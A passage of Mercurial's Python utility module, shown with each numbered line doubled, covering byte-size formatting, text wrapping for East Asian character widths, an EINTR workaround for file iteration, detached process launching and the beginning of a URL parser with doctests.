2244 for multiplier, divisor, format in unittable:
2244 for multiplier, divisor, format in unittable:
2245 if abs(count) >= divisor * multiplier:
2245 if abs(count) >= divisor * multiplier:
2246 return format % (count / float(divisor))
2246 return format % (count / float(divisor))
2247 return unittable[-1][2] % count
2247 return unittable[-1][2] % count
2248
2248
2249 return go
2249 return go
2250
2250
2251 def processlinerange(fromline, toline):
2251 def processlinerange(fromline, toline):
2252 """Check that linerange <fromline>:<toline> makes sense and return a
2252 """Check that linerange <fromline>:<toline> makes sense and return a
2253 0-based range.
2253 0-based range.
2254
2254
2255 >>> processlinerange(10, 20)
2255 >>> processlinerange(10, 20)
2256 (9, 20)
2256 (9, 20)
2257 >>> processlinerange(2, 1)
2257 >>> processlinerange(2, 1)
2258 Traceback (most recent call last):
2258 Traceback (most recent call last):
2259 ...
2259 ...
2260 ParseError: line range must be positive
2260 ParseError: line range must be positive
2261 >>> processlinerange(0, 5)
2261 >>> processlinerange(0, 5)
2262 Traceback (most recent call last):
2262 Traceback (most recent call last):
2263 ...
2263 ...
2264 ParseError: fromline must be strictly positive
2264 ParseError: fromline must be strictly positive
2265 """
2265 """
2266 if toline - fromline < 0:
2266 if toline - fromline < 0:
2267 raise error.ParseError(_("line range must be positive"))
2267 raise error.ParseError(_("line range must be positive"))
2268 if fromline < 1:
2268 if fromline < 1:
2269 raise error.ParseError(_("fromline must be strictly positive"))
2269 raise error.ParseError(_("fromline must be strictly positive"))
2270 return fromline - 1, toline
2270 return fromline - 1, toline
2271
2271
2272 bytecount = unitcountfn(
2272 bytecount = unitcountfn(
2273 (100, 1 << 30, _('%.0f GB')),
2273 (100, 1 << 30, _('%.0f GB')),
2274 (10, 1 << 30, _('%.1f GB')),
2274 (10, 1 << 30, _('%.1f GB')),
2275 (1, 1 << 30, _('%.2f GB')),
2275 (1, 1 << 30, _('%.2f GB')),
2276 (100, 1 << 20, _('%.0f MB')),
2276 (100, 1 << 20, _('%.0f MB')),
2277 (10, 1 << 20, _('%.1f MB')),
2277 (10, 1 << 20, _('%.1f MB')),
2278 (1, 1 << 20, _('%.2f MB')),
2278 (1, 1 << 20, _('%.2f MB')),
2279 (100, 1 << 10, _('%.0f KB')),
2279 (100, 1 << 10, _('%.0f KB')),
2280 (10, 1 << 10, _('%.1f KB')),
2280 (10, 1 << 10, _('%.1f KB')),
2281 (1, 1 << 10, _('%.2f KB')),
2281 (1, 1 << 10, _('%.2f KB')),
2282 (1, 1, _('%.0f bytes')),
2282 (1, 1, _('%.0f bytes')),
2283 )
2283 )
2284
2284
2285 # Matches a single EOL which can either be a CRLF where repeated CR
2285 # Matches a single EOL which can either be a CRLF where repeated CR
2286 # are removed or a LF. We do not care about old Macintosh files, so a
2286 # are removed or a LF. We do not care about old Macintosh files, so a
2287 # stray CR is an error.
2287 # stray CR is an error.
2288 _eolre = remod.compile(br'\r*\n')
2288 _eolre = remod.compile(br'\r*\n')
2289
2289
2290 def tolf(s):
2290 def tolf(s):
2291 return _eolre.sub('\n', s)
2291 return _eolre.sub('\n', s)
2292
2292
2293 def tocrlf(s):
2293 def tocrlf(s):
2294 return _eolre.sub('\r\n', s)
2294 return _eolre.sub('\r\n', s)
2295
2295
2296 if pycompat.oslinesep == '\r\n':
2296 if pycompat.oslinesep == '\r\n':
2297 tonativeeol = tocrlf
2297 tonativeeol = tocrlf
2298 fromnativeeol = tolf
2298 fromnativeeol = tolf
2299 else:
2299 else:
2300 tonativeeol = pycompat.identity
2300 tonativeeol = pycompat.identity
2301 fromnativeeol = pycompat.identity
2301 fromnativeeol = pycompat.identity
2302
2302
2303 def escapestr(s):
2303 def escapestr(s):
2304 # call underlying function of s.encode('string_escape') directly for
2304 # call underlying function of s.encode('string_escape') directly for
2305 # Python 3 compatibility
2305 # Python 3 compatibility
2306 return codecs.escape_encode(s)[0]
2306 return codecs.escape_encode(s)[0]
2307
2307
2308 def unescapestr(s):
2308 def unescapestr(s):
2309 return codecs.escape_decode(s)[0]
2309 return codecs.escape_decode(s)[0]
2310
2310
2311 def forcebytestr(obj):
2311 def forcebytestr(obj):
2312 """Portably format an arbitrary object (e.g. exception) into a byte
2312 """Portably format an arbitrary object (e.g. exception) into a byte
2313 string."""
2313 string."""
2314 try:
2314 try:
2315 return pycompat.bytestr(obj)
2315 return pycompat.bytestr(obj)
2316 except UnicodeEncodeError:
2316 except UnicodeEncodeError:
2317 # non-ascii string, may be lossy
2317 # non-ascii string, may be lossy
2318 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2318 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2319
2319
2320 def uirepr(s):
2320 def uirepr(s):
2321 # Avoid double backslash in Windows path repr()
2321 # Avoid double backslash in Windows path repr()
2322 return repr(s).replace('\\\\', '\\')
2322 return repr(s).replace('\\\\', '\\')
2323
2323
2324 # delay import of textwrap
2324 # delay import of textwrap
2325 def MBTextWrapper(**kwargs):
2325 def MBTextWrapper(**kwargs):
2326 class tw(textwrap.TextWrapper):
2326 class tw(textwrap.TextWrapper):
2327 """
2327 """
2328 Extend TextWrapper for width-awareness.
2328 Extend TextWrapper for width-awareness.
2329
2329
2330 Neither number of 'bytes' in any encoding nor 'characters' is
2330 Neither number of 'bytes' in any encoding nor 'characters' is
2331 appropriate to calculate terminal columns for specified string.
2331 appropriate to calculate terminal columns for specified string.
2332
2332
2333 Original TextWrapper implementation uses built-in 'len()' directly,
2333 Original TextWrapper implementation uses built-in 'len()' directly,
2334 so overriding is needed to use width information of each characters.
2334 so overriding is needed to use width information of each characters.
2335
2335
2336 In addition, characters classified into 'ambiguous' width are
2336 In addition, characters classified into 'ambiguous' width are
2337 treated as wide in East Asian area, but as narrow in other.
2337 treated as wide in East Asian area, but as narrow in other.
2338
2338
2339 This requires use decision to determine width of such characters.
2339 This requires use decision to determine width of such characters.
2340 """
2340 """
2341 def _cutdown(self, ucstr, space_left):
2341 def _cutdown(self, ucstr, space_left):
2342 l = 0
2342 l = 0
2343 colwidth = encoding.ucolwidth
2343 colwidth = encoding.ucolwidth
2344 for i in xrange(len(ucstr)):
2344 for i in xrange(len(ucstr)):
2345 l += colwidth(ucstr[i])
2345 l += colwidth(ucstr[i])
2346 if space_left < l:
2346 if space_left < l:
2347 return (ucstr[:i], ucstr[i:])
2347 return (ucstr[:i], ucstr[i:])
2348 return ucstr, ''
2348 return ucstr, ''
2349
2349
2350 # overriding of base class
2350 # overriding of base class
2351 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2351 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2352 space_left = max(width - cur_len, 1)
2352 space_left = max(width - cur_len, 1)
2353
2353
2354 if self.break_long_words:
2354 if self.break_long_words:
2355 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2355 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2356 cur_line.append(cut)
2356 cur_line.append(cut)
2357 reversed_chunks[-1] = res
2357 reversed_chunks[-1] = res
2358 elif not cur_line:
2358 elif not cur_line:
2359 cur_line.append(reversed_chunks.pop())
2359 cur_line.append(reversed_chunks.pop())
2360
2360
2361 # this overriding code is imported from TextWrapper of Python 2.6
2361 # this overriding code is imported from TextWrapper of Python 2.6
2362 # to calculate columns of string by 'encoding.ucolwidth()'
2362 # to calculate columns of string by 'encoding.ucolwidth()'
2363 def _wrap_chunks(self, chunks):
2363 def _wrap_chunks(self, chunks):
2364 colwidth = encoding.ucolwidth
2364 colwidth = encoding.ucolwidth
2365
2365
2366 lines = []
2366 lines = []
2367 if self.width <= 0:
2367 if self.width <= 0:
2368 raise ValueError("invalid width %r (must be > 0)" % self.width)
2368 raise ValueError("invalid width %r (must be > 0)" % self.width)
2369
2369
2370 # Arrange in reverse order so items can be efficiently popped
2370 # Arrange in reverse order so items can be efficiently popped
2371 # from a stack of chucks.
2371 # from a stack of chucks.
2372 chunks.reverse()
2372 chunks.reverse()
2373
2373
2374 while chunks:
2374 while chunks:
2375
2375
2376 # Start the list of chunks that will make up the current line.
2376 # Start the list of chunks that will make up the current line.
2377 # cur_len is just the length of all the chunks in cur_line.
2377 # cur_len is just the length of all the chunks in cur_line.
2378 cur_line = []
2378 cur_line = []
2379 cur_len = 0
2379 cur_len = 0
2380
2380
2381 # Figure out which static string will prefix this line.
2381 # Figure out which static string will prefix this line.
2382 if lines:
2382 if lines:
2383 indent = self.subsequent_indent
2383 indent = self.subsequent_indent
2384 else:
2384 else:
2385 indent = self.initial_indent
2385 indent = self.initial_indent
2386
2386
2387 # Maximum width for this line.
2387 # Maximum width for this line.
2388 width = self.width - len(indent)
2388 width = self.width - len(indent)
2389
2389
2390 # First chunk on line is whitespace -- drop it, unless this
2390 # First chunk on line is whitespace -- drop it, unless this
2391 # is the very beginning of the text (i.e. no lines started yet).
2391 # is the very beginning of the text (i.e. no lines started yet).
2392 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2392 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2393 del chunks[-1]
2393 del chunks[-1]
2394
2394
2395 while chunks:
2395 while chunks:
2396 l = colwidth(chunks[-1])
2396 l = colwidth(chunks[-1])
2397
2397
2398 # Can at least squeeze this chunk onto the current line.
2398 # Can at least squeeze this chunk onto the current line.
2399 if cur_len + l <= width:
2399 if cur_len + l <= width:
2400 cur_line.append(chunks.pop())
2400 cur_line.append(chunks.pop())
2401 cur_len += l
2401 cur_len += l
2402
2402
2403 # Nope, this line is full.
2403 # Nope, this line is full.
2404 else:
2404 else:
2405 break
2405 break
2406
2406
2407 # The current line is full, and the next chunk is too big to
2407 # The current line is full, and the next chunk is too big to
2408 # fit on *any* line (not just this one).
2408 # fit on *any* line (not just this one).
2409 if chunks and colwidth(chunks[-1]) > width:
2409 if chunks and colwidth(chunks[-1]) > width:
2410 self._handle_long_word(chunks, cur_line, cur_len, width)
2410 self._handle_long_word(chunks, cur_line, cur_len, width)
2411
2411
2412 # If the last chunk on this line is all whitespace, drop it.
2412 # If the last chunk on this line is all whitespace, drop it.
2413 if (self.drop_whitespace and
2413 if (self.drop_whitespace and
2414 cur_line and cur_line[-1].strip() == r''):
2414 cur_line and cur_line[-1].strip() == r''):
2415 del cur_line[-1]
2415 del cur_line[-1]
2416
2416
2417 # Convert current line back to a string and store it in list
2417 # Convert current line back to a string and store it in list
2418 # of all lines (return value).
2418 # of all lines (return value).
2419 if cur_line:
2419 if cur_line:
2420 lines.append(indent + r''.join(cur_line))
2420 lines.append(indent + r''.join(cur_line))
2421
2421
2422 return lines
2422 return lines
2423
2423
2424 global MBTextWrapper
2424 global MBTextWrapper
2425 MBTextWrapper = tw
2425 MBTextWrapper = tw
2426 return tw(**kwargs)
2426 return tw(**kwargs)
2427
2427
2428 def wrap(line, width, initindent='', hangindent=''):
2428 def wrap(line, width, initindent='', hangindent=''):
2429 maxindent = max(len(hangindent), len(initindent))
2429 maxindent = max(len(hangindent), len(initindent))
2430 if width <= maxindent:
2430 if width <= maxindent:
2431 # adjust for weird terminal size
2431 # adjust for weird terminal size
2432 width = max(78, maxindent + 1)
2432 width = max(78, maxindent + 1)
2433 line = line.decode(pycompat.sysstr(encoding.encoding),
2433 line = line.decode(pycompat.sysstr(encoding.encoding),
2434 pycompat.sysstr(encoding.encodingmode))
2434 pycompat.sysstr(encoding.encodingmode))
2435 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2435 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2436 pycompat.sysstr(encoding.encodingmode))
2436 pycompat.sysstr(encoding.encodingmode))
2437 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2437 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2438 pycompat.sysstr(encoding.encodingmode))
2438 pycompat.sysstr(encoding.encodingmode))
2439 wrapper = MBTextWrapper(width=width,
2439 wrapper = MBTextWrapper(width=width,
2440 initial_indent=initindent,
2440 initial_indent=initindent,
2441 subsequent_indent=hangindent)
2441 subsequent_indent=hangindent)
2442 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2442 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2443
2443
2444 if (pyplatform.python_implementation() == 'CPython' and
2444 if (pyplatform.python_implementation() == 'CPython' and
2445 sys.version_info < (3, 0)):
2445 sys.version_info < (3, 0)):
2446 # There is an issue in CPython that some IO methods do not handle EINTR
2446 # There is an issue in CPython that some IO methods do not handle EINTR
2447 # correctly. The following table shows what CPython version (and functions)
2447 # correctly. The following table shows what CPython version (and functions)
2448 # are affected (buggy: has the EINTR bug, okay: otherwise):
2448 # are affected (buggy: has the EINTR bug, okay: otherwise):
2449 #
2449 #
2450 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2450 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2451 # --------------------------------------------------
2451 # --------------------------------------------------
2452 # fp.__iter__ | buggy | buggy | okay
2452 # fp.__iter__ | buggy | buggy | okay
2453 # fp.read* | buggy | okay [1] | okay
2453 # fp.read* | buggy | okay [1] | okay
2454 #
2454 #
2455 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2455 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2456 #
2456 #
2457 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2457 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2458 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2458 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2459 #
2459 #
2460 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2460 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2461 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2461 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2462 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2462 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2463 # fp.__iter__ but not other fp.read* methods.
2463 # fp.__iter__ but not other fp.read* methods.
2464 #
2464 #
2465 # On modern systems like Linux, the "read" syscall cannot be interrupted
2465 # On modern systems like Linux, the "read" syscall cannot be interrupted
2466 # when reading "fast" files like on-disk files. So the EINTR issue only
2466 # when reading "fast" files like on-disk files. So the EINTR issue only
2467 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2467 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2468 # files approximately as "fast" files and use the fast (unsafe) code path,
2468 # files approximately as "fast" files and use the fast (unsafe) code path,
2469 # to minimize the performance impact.
2469 # to minimize the performance impact.
2470 if sys.version_info >= (2, 7, 4):
2470 if sys.version_info >= (2, 7, 4):
2471 # fp.readline deals with EINTR correctly, use it as a workaround.
2471 # fp.readline deals with EINTR correctly, use it as a workaround.
2472 def _safeiterfile(fp):
2472 def _safeiterfile(fp):
2473 return iter(fp.readline, '')
2473 return iter(fp.readline, '')
2474 else:
2474 else:
2475 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2475 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2476 # note: this may block longer than necessary because of bufsize.
2476 # note: this may block longer than necessary because of bufsize.
2477 def _safeiterfile(fp, bufsize=4096):
2477 def _safeiterfile(fp, bufsize=4096):
2478 fd = fp.fileno()
2478 fd = fp.fileno()
2479 line = ''
2479 line = ''
2480 while True:
2480 while True:
2481 try:
2481 try:
2482 buf = os.read(fd, bufsize)
2482 buf = os.read(fd, bufsize)
2483 except OSError as ex:
2483 except OSError as ex:
2484 # os.read only raises EINTR before any data is read
2484 # os.read only raises EINTR before any data is read
2485 if ex.errno == errno.EINTR:
2485 if ex.errno == errno.EINTR:
2486 continue
2486 continue
2487 else:
2487 else:
2488 raise
2488 raise
2489 line += buf
2489 line += buf
2490 if '\n' in buf:
2490 if '\n' in buf:
2491 splitted = line.splitlines(True)
2491 splitted = line.splitlines(True)
2492 line = ''
2492 line = ''
2493 for l in splitted:
2493 for l in splitted:
2494 if l[-1] == '\n':
2494 if l[-1] == '\n':
2495 yield l
2495 yield l
2496 else:
2496 else:
2497 line = l
2497 line = l
2498 if not buf:
2498 if not buf:
2499 break
2499 break
2500 if line:
2500 if line:
2501 yield line
2501 yield line
2502
2502
2503 def iterfile(fp):
2503 def iterfile(fp):
2504 fastpath = True
2504 fastpath = True
2505 if type(fp) is file:
2505 if type(fp) is file:
2506 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2506 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2507 if fastpath:
2507 if fastpath:
2508 return fp
2508 return fp
2509 else:
2509 else:
2510 return _safeiterfile(fp)
2510 return _safeiterfile(fp)
2511 else:
2511 else:
2512 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2512 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2513 def iterfile(fp):
2513 def iterfile(fp):
2514 return fp
2514 return fp
2515
2515
2516 def iterlines(iterator):
2516 def iterlines(iterator):
2517 for chunk in iterator:
2517 for chunk in iterator:
2518 for line in chunk.splitlines():
2518 for line in chunk.splitlines():
2519 yield line
2519 yield line
2520
2520
2521 def expandpath(path):
2521 def expandpath(path):
2522 return os.path.expanduser(os.path.expandvars(path))
2522 return os.path.expanduser(os.path.expandvars(path))
2523
2523
2524 def hgcmd():
2524 def hgcmd():
2525 """Return the command used to execute current hg
2525 """Return the command used to execute current hg
2526
2526
2527 This is different from hgexecutable() because on Windows we want
2527 This is different from hgexecutable() because on Windows we want
2528 to avoid things opening new shell windows like batch files, so we
2528 to avoid things opening new shell windows like batch files, so we
2529 get either the python call or current executable.
2529 get either the python call or current executable.
2530 """
2530 """
2531 if mainfrozen():
2531 if mainfrozen():
2532 if getattr(sys, 'frozen', None) == 'macosx_app':
2532 if getattr(sys, 'frozen', None) == 'macosx_app':
2533 # Env variable set by py2app
2533 # Env variable set by py2app
2534 return [encoding.environ['EXECUTABLEPATH']]
2534 return [encoding.environ['EXECUTABLEPATH']]
2535 else:
2535 else:
2536 return [pycompat.sysexecutable]
2536 return [pycompat.sysexecutable]
2537 return gethgcmd()
2537 return gethgcmd()
2538
2538
2539 def rundetached(args, condfn):
2539 def rundetached(args, condfn):
2540 """Execute the argument list in a detached process.
2540 """Execute the argument list in a detached process.
2541
2541
2542 condfn is a callable which is called repeatedly and should return
2542 condfn is a callable which is called repeatedly and should return
2543 True once the child process is known to have started successfully.
2543 True once the child process is known to have started successfully.
2544 At this point, the child process PID is returned. If the child
2544 At this point, the child process PID is returned. If the child
2545 process fails to start or finishes before condfn() evaluates to
2545 process fails to start or finishes before condfn() evaluates to
2546 True, return -1.
2546 True, return -1.
2547 """
2547 """
2548 # Windows case is easier because the child process is either
2548 # Windows case is easier because the child process is either
2549 # successfully starting and validating the condition or exiting
2549 # successfully starting and validating the condition or exiting
2550 # on failure. We just poll on its PID. On Unix, if the child
2550 # on failure. We just poll on its PID. On Unix, if the child
2551 # process fails to start, it will be left in a zombie state until
2551 # process fails to start, it will be left in a zombie state until
2552 # the parent wait on it, which we cannot do since we expect a long
2552 # the parent wait on it, which we cannot do since we expect a long
2553 # running process on success. Instead we listen for SIGCHLD telling
2553 # running process on success. Instead we listen for SIGCHLD telling
2554 # us our child process terminated.
2554 # us our child process terminated.
2555 terminated = set()
2555 terminated = set()
2556 def handler(signum, frame):
2556 def handler(signum, frame):
2557 terminated.add(os.wait())
2557 terminated.add(os.wait())
2558 prevhandler = None
2558 prevhandler = None
2559 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2559 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2560 if SIGCHLD is not None:
2560 if SIGCHLD is not None:
2561 prevhandler = signal.signal(SIGCHLD, handler)
2561 prevhandler = signal.signal(SIGCHLD, handler)
2562 try:
2562 try:
2563 pid = spawndetached(args)
2563 pid = spawndetached(args)
2564 while not condfn():
2564 while not condfn():
2565 if ((pid in terminated or not testpid(pid))
2565 if ((pid in terminated or not testpid(pid))
2566 and not condfn()):
2566 and not condfn()):
2567 return -1
2567 return -1
2568 time.sleep(0.1)
2568 time.sleep(0.1)
2569 return pid
2569 return pid
2570 finally:
2570 finally:
2571 if prevhandler is not None:
2571 if prevhandler is not None:
2572 signal.signal(signal.SIGCHLD, prevhandler)
2572 signal.signal(signal.SIGCHLD, prevhandler)
2573
2573
2574 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2574 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2575 """Return the result of interpolating items in the mapping into string s.
2575 """Return the result of interpolating items in the mapping into string s.
2576
2576
2577 prefix is a single character string, or a two character string with
2577 prefix is a single character string, or a two character string with
2578 a backslash as the first character if the prefix needs to be escaped in
2578 a backslash as the first character if the prefix needs to be escaped in
2579 a regular expression.
2579 a regular expression.
2580
2580
2581 fn is an optional function that will be applied to the replacement text
2581 fn is an optional function that will be applied to the replacement text
2582 just before replacement.
2582 just before replacement.
2583
2583
2584 escape_prefix is an optional flag that allows using doubled prefix for
2584 escape_prefix is an optional flag that allows using doubled prefix for
2585 its escaping.
2585 its escaping.
2586 """
2586 """
2587 fn = fn or (lambda s: s)
2587 fn = fn or (lambda s: s)
2588 patterns = '|'.join(mapping.keys())
2588 patterns = '|'.join(mapping.keys())
2589 if escape_prefix:
2589 if escape_prefix:
2590 patterns += '|' + prefix
2590 patterns += '|' + prefix
2591 if len(prefix) > 1:
2591 if len(prefix) > 1:
2592 prefix_char = prefix[1:]
2592 prefix_char = prefix[1:]
2593 else:
2593 else:
2594 prefix_char = prefix
2594 prefix_char = prefix
2595 mapping[prefix_char] = prefix_char
2595 mapping[prefix_char] = prefix_char
2596 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2596 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2597 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2597 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2598
2598
2599 def getport(port):
2599 def getport(port):
2600 """Return the port for a given network service.
2600 """Return the port for a given network service.
2601
2601
2602 If port is an integer, it's returned as is. If it's a string, it's
2602 If port is an integer, it's returned as is. If it's a string, it's
2603 looked up using socket.getservbyname(). If there's no matching
2603 looked up using socket.getservbyname(). If there's no matching
2604 service, error.Abort is raised.
2604 service, error.Abort is raised.
2605 """
2605 """
2606 try:
2606 try:
2607 return int(port)
2607 return int(port)
2608 except ValueError:
2608 except ValueError:
2609 pass
2609 pass
2610
2610
2611 try:
2611 try:
2612 return socket.getservbyname(port)
2612 return socket.getservbyname(port)
2613 except socket.error:
2613 except socket.error:
2614 raise Abort(_("no port number associated with service '%s'") % port)
2614 raise Abort(_("no port number associated with service '%s'") % port)
2615
2615
2616 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2616 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2617 '0': False, 'no': False, 'false': False, 'off': False,
2617 '0': False, 'no': False, 'false': False, 'off': False,
2618 'never': False}
2618 'never': False}
2619
2619
2620 def parsebool(s):
2620 def parsebool(s):
2621 """Parse s into a boolean.
2621 """Parse s into a boolean.
2622
2622
2623 If s is not a valid boolean, returns None.
2623 If s is not a valid boolean, returns None.
2624 """
2624 """
2625 return _booleans.get(s.lower(), None)
2625 return _booleans.get(s.lower(), None)
2626
2626
2627 _hextochr = dict((a + b, chr(int(a + b, 16)))
2627 _hextochr = dict((a + b, chr(int(a + b, 16)))
2628 for a in string.hexdigits for b in string.hexdigits)
2628 for a in string.hexdigits for b in string.hexdigits)
2629
2629
2630 class url(object):
2630 class url(object):
2631 r"""Reliable URL parser.
2631 r"""Reliable URL parser.
2632
2632
2633 This parses URLs and provides attributes for the following
2633 This parses URLs and provides attributes for the following
2634 components:
2634 components:
2635
2635
2636 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2636 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2637
2637
2638 Missing components are set to None. The only exception is
2638 Missing components are set to None. The only exception is
2639 fragment, which is set to '' if present but empty.
2639 fragment, which is set to '' if present but empty.
2640
2640
2641 If parsefragment is False, fragment is included in query. If
2641 If parsefragment is False, fragment is included in query. If
2642 parsequery is False, query is included in path. If both are
2642 parsequery is False, query is included in path. If both are
2643 False, both fragment and query are included in path.
2643 False, both fragment and query are included in path.
2644
2644
2645 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2645 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2646
2646
2647 Note that for backward compatibility reasons, bundle URLs do not
2647 Note that for backward compatibility reasons, bundle URLs do not
2648 take host names. That means 'bundle://../' has a path of '../'.
2648 take host names. That means 'bundle://../' has a path of '../'.
2649
2649
2650 Examples:
2650 Examples:
2651
2651
2652 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2652 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2653 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2653 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2654 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2654 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2655 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2655 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2656 >>> url(b'file:///home/joe/repo')
2656 >>> url(b'file:///home/joe/repo')
2657 <url scheme: 'file', path: '/home/joe/repo'>
2657 <url scheme: 'file', path: '/home/joe/repo'>
2658 >>> url(b'file:///c:/temp/foo/')
2658 >>> url(b'file:///c:/temp/foo/')
2659 <url scheme: 'file', path: 'c:/temp/foo/'>
2659 <url scheme: 'file', path: 'c:/temp/foo/'>
2660 >>> url(b'bundle:foo')
2660 >>> url(b'bundle:foo')
2661 <url scheme: 'bundle', path: 'foo'>
2661 <url scheme: 'bundle', path: 'foo'>
2662 >>> url(b'bundle://../foo')
2662 >>> url(b'bundle://../foo')
2663 <url scheme: 'bundle', path: '../foo'>
2663 <url scheme: 'bundle', path: '../foo'>
2664 >>> url(br'c:\foo\bar')
2664 >>> url(br'c:\foo\bar')
2665 <url path: 'c:\\foo\\bar'>
2665 <url path: 'c:\\foo\\bar'>
2666 >>> url(br'\\blah\blah\blah')
2666 >>> url(br'\\blah\blah\blah')
2667 <url path: '\\\\blah\\blah\\blah'>
2667 <url path: '\\\\blah\\blah\\blah'>
2668 >>> url(br'\\blah\blah\blah#baz')
2668 >>> url(br'\\blah\blah\blah#baz')
2669 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2669 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2670 >>> url(br'file:///C:\users\me')
2670 >>> url(br'file:///C:\users\me')
2671 <url scheme: 'file', path: 'C:\\users\\me'>
2671 <url scheme: 'file', path: 'C:\\users\\me'>
2672
2672
2673 Authentication credentials:
2673 Authentication credentials:
2674
2674
2675 >>> url(b'ssh://joe:xyz@x/repo')
2675 >>> url(b'ssh://joe:xyz@x/repo')
2676 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2676 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2677 >>> url(b'ssh://joe@x/repo')
2677 >>> url(b'ssh://joe@x/repo')
2678 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2678 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2679
2679
2680 Query strings and fragments:
2680 Query strings and fragments:
2681
2681
2682 >>> url(b'http://host/a?b#c')
2682 >>> url(b'http://host/a?b#c')
2683 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2683 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2684 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2684 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2685 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2685 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2686
2686
2687 Empty path:
2687 Empty path:
2688
2688
2689 >>> url(b'')
2689 >>> url(b'')
2690 <url path: ''>
2690 <url path: ''>
2691 >>> url(b'#a')
2691 >>> url(b'#a')
2692 <url path: '', fragment: 'a'>
2692 <url path: '', fragment: 'a'>
2693 >>> url(b'http://host/')
2693 >>> url(b'http://host/')
2694 <url scheme: 'http', host: 'host', path: ''>
2694 <url scheme: 'http', host: 'host', path: ''>
2695 >>> url(b'http://host/#a')
2695 >>> url(b'http://host/#a')
2696 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2696 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2697
2697
2698 Only scheme:
2698 Only scheme:
2699
2699
2700 >>> url(b'http:')
2700 >>> url(b'http:')
2701 <url scheme: 'http'>
2701 <url scheme: 'http'>
2702 """
2702 """
2703
2703
2704 _safechars = "!~*'()+"
2704 _safechars = "!~*'()+"
2705 _safepchars = "/!~*'()+:\\"
2705 _safepchars = "/!~*'()+:\\"
2706 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2706 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2707
2707
2708 def __init__(self, path, parsequery=True, parsefragment=True):
2708 def __init__(self, path, parsequery=True, parsefragment=True):
2709 # We slowly chomp away at path until we have only the path left
2709 # We slowly chomp away at path until we have only the path left
2710 self.scheme = self.user = self.passwd = self.host = None
2710 self.scheme = self.user = self.passwd = self.host = None
2711 self.port = self.path = self.query = self.fragment = None
2711 self.port = self.path = self.query = self.fragment = None
2712 self._localpath = True
2712 self._localpath = True
2713 self._hostport = ''
2713 self._hostport = ''
2714 self._origpath = path
2714 self._origpath = path
2715
2715
